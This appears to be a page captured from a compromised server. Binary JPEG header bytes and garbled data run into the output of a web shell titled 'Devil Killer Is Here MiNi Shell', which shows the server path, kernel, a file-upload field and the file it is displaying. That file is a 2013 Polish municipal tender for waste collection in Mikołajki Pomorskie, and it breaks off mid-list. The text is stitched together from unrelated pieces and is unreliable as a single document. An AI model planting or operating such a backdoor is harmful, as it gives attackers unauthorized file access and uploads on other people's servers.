JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130502/174782-N-2013.html

<p class="kh_header"><b>Mikołajki Pomorskie: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Mikołajki Pomorskie.</b><br>
<b>Numer ogłoszenia: 174782 - 2013; data zamieszczenia: 02.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Mikołajki Pomorskich , ul. Dzierzgońska 2, 82-433 Mikołajki Pomorskie, woj. pomorskie, tel. 055 6404357 w. 20, faks 055 6404461.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.BIP.MikolajkiPomorskie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mikolajkipomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Mikołajki Pomorskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik nr 1 

OPIS PRZEDMIOTU ZAMÓWIENIA 

I. CHARAKTERYSTYKA  GMINY MIKOŁAJKI  POMORSKIE
1. 
Powierzchnia 
Powierzchnia  Gminy Mikołajki Pomorskie  wynosi ok. 91,6 km2.

2. 
Struktura Gminy 
W skład Gminy Mikołajki Pomorskie  wchodzi 15 sołectw Mikołajki Pomorskie-Cierpięta-Kołoząb Mały, Balewo, Cieszymowo-Linki, Dąbrówka Pruska, Dworek, Kołoząb, Krasna Łąka-Balewko, Krastudy, Mirowice, Nowe Minięta, Perklice, Pierzchowice-Namirowo, Sadłuki, Stążki, Wilczewo.                                                                                        

3. 
Liczba mieszkańców (stan na marzec 2013 r.)  3 764  - jest to liczba mieszkańców zameldowanych, 
liczba mieszkańców faktycznie zamieszkujących może być inna. 
Gmina  Mikołajki Pomorskie   

II. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA 
Przedmiotem niniejszego zamówienia jest odbieranie i zagospodarowanie wskazanych 
w opisie przedmiotu zamówienia odpadów komunalnych od właścicieli nieruchomości na których zamieszkują mieszkańcy z terenu  Gminy Mikołajki Pomorskie, w taki sposób aby zostały zapewnione poziomy recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczona masa odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z dyspozycjami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. Nr 391 ze zm.), zapisami Planu Gospodarki Odpadami dla Województwa Pomorskiego 2018 przyjętego przez Sejmik 
Województwa Pomorskiego uchwała nr 415/XX/12 z dnia 25 czerwca 2012 r. w sprawie przyjęcia Planu Gospodarki Odpadami dla Województwa Pomorskiego 2018 a także Regulaminem utrzymania czystości i porządku na terenie Gminy Mikołajki Pomorskie przyjętego uchwałą nr XXIII/144/2012 z dnia 29 listopada 2012 r. przez Radę Gminy w Mikołajkach Pomorskich.

Dane szczegółowe dotyczące ilości budynków jednorodzinnych oraz wielorodzinnych z których należy obierać odpady komunalne  przedstawiono w punkcie 3 opisu przedmiotu zamówienia. 

ZABUDOWA WIELORODZINNA I JEDNORODZINNA 


1) A. Odpady komunalne niesegregowane (zmieszane) - kod 20 03 01 

Niesegregowane (zmieszane) odpady komunalne będą zbierane do pojemników ustawionych 
w miejscach do tego przeznaczonych, wytypowanych przez właścicieli nieruchomości 
jednorodzinnych i wielorodzinnych. 
Częstotliwość wywozu odpadów -  Wykonawca zobowiązany jest do odbioru odpadów z częstotliwością zapewniającą nie przepełnianie się pojemników o pojemn ości 110l bądź 1100l, jednakże nie mniej niż jeden raz na dwa tygodnie. 

C. Odpady wielkogabarytowe - kod 20 03 07 

Meble, odpady wielkogabarytowe odbierane będą z terenu nieruchomości z częstotliwością co najmniej dwa razy do roku. Termin przeprowadzenia odbioru odpadów 
wielkogabarytowych Wykonawca  zawrze w sporządzonym harmonogramie odbioru odpadów i powiadomi Zamawiającego, oraz mieszkańców poprzez ogłoszenia.

D. Zużyty sprzęt elektryczny i elektroniczny (AGD, RTV) - kod 20 01 23, 20 01 35, 
20 01 36 

 Zużyty sprzęt elektryczny i elektroniczny (AGD, RTV) odbierany będzie miarę potrzeb  z Punktu Selektywnej Zbiórki Odpadów Komunalnych w miarę potrzeb, który  mieścić się będzie w Mikołajkach Pomorskich , przy ulicy Gdakowskiej.


F. Baterie - kod 20 01 33,  20 01 34 

Wyeksploatowane  baterie odbierane będą  z terenów obiektów użyteczności publicznej tj
- Szkoła Podstawowa  w Mikołajkach Pom. Ul. Szreibera 10,
- Gimnazjum Publiczne w Mikołajkach Pom. Ul. Szreibera  12,
- Przedszkole Samorządowe w Mikołajkach Pom. Ul. Kościuszki  73, 
- Urząd Gminy w Mikołajkach Pom. Ul. Dzierzgońska 2,
- Punkt Selektywnej Zbiórki Odpadów Komunalnych w Mikołajkach Pom. 

Wykonawca zobowiązany jest odbierać powyższe odpady z pojemników  w miarę potrzeb. 
O powyższych terminach powiadomić Zamawiającego.

G. Leki- 20 01 32

Nie  zużyte i przeterminowane leki odbierane będą ze specjalnie oznakowanego pojemnika, który  znajdować się będzie w Aptece Pomorskiej w Mikołajkach Pomorskich, ul.Dworcowa 4.

Wykonawca zobowiązany jest  odbierać powyższe odpady w miarę potrzeb po uzgodnieniu terminów z właścicielem apteki. O powyższych terminach  powiadomić  Zamawiającego.

H. Chemikalia, farby, lakiery, środki ochrony roślin, zużyte opony, odpady budowlane i rozbiórkowe, szkło zbrojeniowe i techniczne, szyby okienne, itp. 

Wykonawca zobowiązany jest  do odbioru przedmiotowych frakcji odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych w miarę potrzeb, po  uzgodnieniu terminu z Zamawiającym.

Wykonawca  zobowiązany jest do odbioru od właścicieli  nieruchomości zamieszkałych,  odpadów  budowlanych i rozbiórkowych za dodatkową opłatą.


3) WYKAZ URZĄDZEŃ DO GROMADZENIA ODPADÓW I SPRZĘTU TECHNICZNEGO 

A. Urządzenia do gromadzenia odpadów  
Zabudowa wielorodzinna 
Odpady zmieszane (niesegregowane) - pojemniki 110l, 1100 l 
Zabudowa jednorodzinna
Odpady zmieszane (niesegregowane) - pojemniki 110l, 1100l 

B. Sprzęt techniczny i baza magazynowo-transportowa 
Wykonawca zobowiązany jest spełniać szczegółowe wymagania określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013 r. Nr 0, poz. 122). 

Baza magazynowo-transportowa 
Podmiot odbierający odpady komunalne od właścicieli nieruchomości zobowiązany jest do 
posiadania bazy magazynowo-transportowej w gminie, z której terenu odbiera odpady lub w odległości nie większej niż 60 km od granic Gminy Mikołajki Pomorskie, na terenie do którego posiada tytuł prawny. 

Wyposażenie bazy magazynowo-transportowej 

Teren bazy magazynowo-transportowej należy zabezpieczyć w sposób uniemożliwiający wstęp osobom nieupoważnionym, 
Miejsce przeznaczone do parkowania pojazdów należy zabezpieczyć przed emisją 
zanieczyszczeń do gruntu, 
Miejsce magazynowania selektywnie zebranych odpadów komunalnych należy zabezpieczyć przed emisją zanieczyszczeń do gruntu oraz zabezpieczyć przed działaniem czynników atmosferycznych, 
Teren bazy magazynowo-transportowej należy wyposażyć w urządzenia lub systemy 
zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - 
Prawo wodne (Dz. U. z 2012 r. poz. 145, 951 i 1513 oraz z 2013 r. poz. 21), 
Należy zapewnić miejsca przeznaczone do parkowania pojazdów, 
Należy zapewnić pomieszczenia socjalne dla pracowników odpowiadające liczbie 
zatrudnionych osób, 
Należy zapewnić miejsca do magazynowania selektywnie zebranych odpadów z grupy 
odpadów komunalnych, 
W przypadku gdy na terenie bazy następuje magazynowanie odpadów, należy ją wyposażyć w legalizowaną samochodową wagę najazdową, 
Należy wyznaczyć punkt bieżącej konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej, 
Na terenie bazy magazynowo-transportowej muszą znajdować się urządzenia do 
selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc 
przetwarzania. 
Część transportowa i magazynowa mogą znajdować się na oddzielnych terenach z zachowaniem wyżej powołanych warunków. 

5 
 Sprzęt techniczny do odbierania odpadów komunalnych 

Wykonawca zobowiązany jest do posiadania
Co najmniej 2 pojazdów do odbierania zmieszanych odpadów komunalnych 
o pojemności: 1 pojazd po minimum 16 m 3 oraz 1 pojazd minimum 12,5 m 3 o masie 
całkowitej nie przekraczającej 30t. Co najmniej jeden pojazd musi być wyposażony w sprzęt umożliwiający mycie, dezynfekcję i dezynsekcję pojemników do gromadzenia zmieszanych odpadów komunalnych 
Co najmniej 2 pojazdów do odbierania segregowanych odpadów komunalnych o pojemności minimum 3,5 m3;  a także co najmniej 1 pojazd  do odbioru odpadów bez funkcji kompaktującej.

Wyposażenie techniczne pojazdów do odbierania odpadów komunalnych

Konstrukcja pojazdów musi zabezpieczać przed rozwiewaniem, rozpylaniem przewożonych 
odpadów oraz minimalizowała oddziaływania czynników atmosferycznych na odpady;
Systemy monitoringu bazującego na systemie pozycjonowania satelitarnego (GPS), 
umożliwiające trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu 
pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku 
odpadów w sposób umożliwiający weryfikację tychże danych. Narzędzia 
lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników. 


III. SZCZEGÓŁOWE DANE CHARAKTERYZUJĄCE ZAMÓWIENIE 
 
Liczba budynków jednorodzinnych (gospodarstw domowych) -dane szacunkowe 
GMINA 
Ok. 550

Liczba budynków wielorodzinnych - dane szacunkowe 
GMINA 
Ok. 54
Szacunkowa liczba kilometrów do objazdu całej trasy wynosi około 90 km.

UWAGA: Ilości nieruchomości są orientacyjne. Zamawiający zastrzega sobie prawo do zmiany ilości punktów odbioru odpadów. Ich ilość w ciągu okresu realizacji zamówienia może wzrosnąć lub zmaleć i jest zależna od złożonych deklaracji przez właścicieli nieruchomości. 

Ilość odpadów odebranych z terenu Gminy Mikołajki Pomorskie , na podstawie sprawozdań składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych w latach 
2010-2012 wyniosła: 

Rodzaj odpadów	Ilość odpadów w 2010 r. w tonach	Ilość odpadów w 
2011 r. w t. 	Ilość odpadów w 2012 r. w t.
Zmieszane odpady komunalne	508,36	534,41	        547,4
Odpady wielkogabarytowe	   -	   - 	        -
Zużyty sprzęt elektryczny i elektroniczny	
   - 	
     1,6	             
           0,6

IV OBOWIĄZKI WYKONAWCY PRZED ROZPOCZĘCIEM I W TRAKCIE REALIZACJI ZAMÓWIENIA 

1. 
Przed rozpoczęciem realizacji zamówienia Zamawiający dostarczy Wykonawcy szczegółowy 
wykaz punktów adresowych nieruchomości zamieszkałych na terenie gminy  Mikołajki Pomorskie  objętych umową odbioru i zagospodarowania odpadów komunalnych. Ponadto 
przed rozpoczęciem realizacji zmówienia Wykonawca sporządzi i przedłoży Zamawiającemu 
harmonogram odbioru odpadów komunalnych dot. powyżej wskazanych nieruchomości 
obowiązujący w roku 2013. Harmonogramy na kolejne lata sporządzane będą na podstawie 
terminów zawartych w harmonogramie z 2013 r. Zaakceptowany harmonogram odbioru 
odpadów z podziałem na ulice i miejscowości w gminie, Zamawiający ma obowiązek przekazać każdemu właścicielowi nieruchomości z której będą odbierane odpady komunalne oraz zamieścić na swojej stronie internetowej. 
Zamawiający zamieści przedstawiony harmonogram odbioru odpadów na swojej stronie internetowej WWW.mikolajkipomorskie.pl
2. 
Właściciel nieruchomości  odpowiada za stan techniczny i sanitarny pojemników do gromadzenia odpadów. 
Na wezwania Zamawiającego jest zobowiązany do ich napraw, systematycznych konserwacji, 
mycia i dezynfekcji oraz wymiany uszkodzonych lub zniszczonych pojemników. 
3. 
Wykonawca jest zobowiązany do zebrania także odpadów leżących obok altanek śmietnikowych i pojemników jeśli jest to wynikiem jego działalności. 
4. 
Wykonawca będzie przekazywał sprawozdania z wykonanych usług zgodnie z ustawą o 
utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 r. (tekst jednolity w Dz. U. z 2012 r., poz. 391). 

5. Za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru 
odpadów odpowiedzialność ponosi Wykonawca. 
6. Wykonawca zobowiązany jest do przestrzegania obowiązujących w trakcie trwania umowy przepisów prawnych, a w szczególności: 
a) ustawy o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 r. (tekst 
jednolity w Dz. U. z 2012 r., poz. 391), 
b) ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21), 
c) Rozporządzenia Ministra Środowiska z dnia 25 stycznia 2013 r. w sprawie szczegółowych 
wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 
z 2013 r., poz. 122); 
d) uchwały nr XXIII/144/2012 Rady Gminy w Mikołajkach Pomorskich  z dnia 28 listopada 2012 r. w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie gminy Mikołajki Pomorskie. 
e) 
uchwały nr XXIII /147/2012 Rady Gminy w Mikołajkach Pomorskich  z dnia 28 listopada 2012 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami 
komunalnymi. 

7. Odpady zebrane od właścicieli nieruchomości z tereny Gminy Mikołajki Pomorskie, Wykonawca zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu) zgodnie z obowiązującym prawem i przekazać do instalacji wskazanych w Planie Gospodarki Odpadami dla Województwa Pomorskiego 2018 przyjętego przez Sejmik Województwa Pomorskiego uchwała nr 415/XX/12 z dnia 25 czerwca 2012 r. w sprawie przyjęcia Planu Gospodarki Odpadami dla Województwa Pomorskiego 2018. Na dowód wykonywania tychże obowiązków, Wykonawca przedstawi Zamawiającemu dowody potwierdzające wykonanie obowiązku przez przedłożenie kart przekazania odpadów. 
8. Zamówienie nie obejmuje odbierania odpadów komunalnych od właścicieli nieruchomości na których nie zamieszkują mieszkańcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>5. Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze Wykonawca spełnia w/w warunek, jeżeli wykaże, iż posiada: a) zezwolenie na prowadzenie działalności w zakresie transportu odpadów komunalnych wydane na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach. Zamawiający dopuszcza posiadanie decyzji na transport odpadów komunalnych wydanego na  podstawie ustawy z 27 kwietnia 2001 r. o odpadach lub wpisu do rejestru, o którym mowa w art. 49 ust.1 ustawy z dnia 14 grudnia 2012 r. o odpadach. b) aktualne zaświadczenie o wpisie do rejestru działalności regulowanej prowadzonego przez Urząd Gminy w Mikołajkach Pomorskich zgodnie z art. 9c ust.1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach(t.j. Dz.U. z 2012 r. poz. 391 ze zmianami). Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast w/w dokumentów składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę, potwierdzające odpowiednio, że posiada uprawnienia do wykonywania działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu  wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia , Wykonawca winien wykazać, że: W jednym roku z okresu ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy w tym okresie-realizację usługi z zakresu odbierania  i transportu odpadów  komunalnych od właścicieli nieruchomości do składowania bądź unieszkodliwiania  o masie nie mniejszej niż 3,00 Mg/rok</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony wówczas, gdy Wykonawca wykaże, że dysponuje lub będzie  dysponował co najmniej :
 2 pojazdami  do odbierania zmieszanych odpadów komunalnych  o pojemności: 1 pojazd po minimum 16 m3 oraz 1 pojazd minimum 12, 5 m3 o masie  całkowitej nie przekraczającej 30t. 
Co najmniej jeden pojazd musi być wyposażony w sprzęt umożliwiający mycie, dezynfekcję i dezynsekcję pojemników do gromadzenia zmieszanych odpadów komunalnych; 
Co najmniej 2 pojazdów do odbierania segregowanych odpadów komunalnych o pojemności minimum 3,5 m3;  a także co najmniej 1 pojazd  do odbioru odpadów bez funkcji kompaktującej.  Wyposażenie techniczne pojazdów do odbierania odpadów komunalnych:   Konstrukcja pojazdów musi zabezpieczać przed rozwiewaniem, rozpylaniem przewożonych  odpadów oraz minimalizowała oddziaływania czynników atmosferycznych na odpady; Systemy monitoringu bazującego na systemie pozycjonowania satelitarnego (GPS),  umożliwiające trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu  pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku  odpadów w sposób umożliwiający weryfikację tychże danych. Narzędzia  lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie  warunku poprzez zło złożenie oświadczenia stanowiącego załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  potwierdza spełnienie spełnienie warunku poprzez  złożenie oświadczenia stanowiącego załącznik do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dowodami o których mowa w pakt A3 są poświadczenia, z tym że w odniesieniu do nadal dokonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w poświadczenia może je zastąpić oświadczeniem Wykonawcy.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przekładania dowodów, o których mowa  w pakt A.3. Zamawiający uzna również za dowód potwierdzający należyte wykonanie usługi m.in. dokumenty potwierdzające odbiór odpadów komunalnych, np. referencje, protokoły odbioru.
Realizację usługi z zakresu odbierania i transportu odpadów  komunalnych od właścicieli nieruchomości  do składowania bądź unieszkodliwiania  o masie nie mniejszej niż 3,00 Mg/rok;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

